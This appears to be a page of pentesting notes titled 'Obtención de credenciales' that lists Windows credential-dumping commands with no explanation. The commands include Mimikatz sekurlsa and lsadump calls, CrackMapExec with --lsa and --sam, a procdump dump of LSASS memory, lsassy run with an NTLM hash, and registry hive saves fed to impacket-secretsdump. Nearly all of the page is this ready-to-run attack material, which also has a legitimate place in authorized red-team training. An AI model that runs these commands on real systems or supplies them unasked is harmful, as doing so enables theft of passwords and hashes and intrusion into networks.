3. Obtención de credenciales
Last updated
Was this helpful?
Last updated
Was this helpful?
Was this helpful?
Mimikatz
mimikatz.exe
Invoke-Mimikatz.ps1
SharpKatz.exe
pypykatz.exe
MimiKatz
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
CrackMapExec
crackmapexec smb <IP> -u <USER> -p <PASS> --lsa
procdump
1- Get-Process -Name LSASS
2- .\\procdump.exe -ma <ProcNum> lsass.dmp
lsassy
lsassy -u <USER> -H <NTLM> -d <domain.full> <IP> --users
SecretDump
1- reg save HKLM\\sam sam
2- reg save HKLM\\system system
3- reg save HKLM\\security security
4- impacket-secretsdump -sam sam -security security -system system LOCAL
MimiKatz
Invoke-Mimikatz -Command '"lsadump::sam"'
CrackMapExec
crackmapexec smb <IP> -u <USER> -p <PASS> --sam
MimiKatz
Invoke-Mimikatz -Command '"vault::cred /patch"'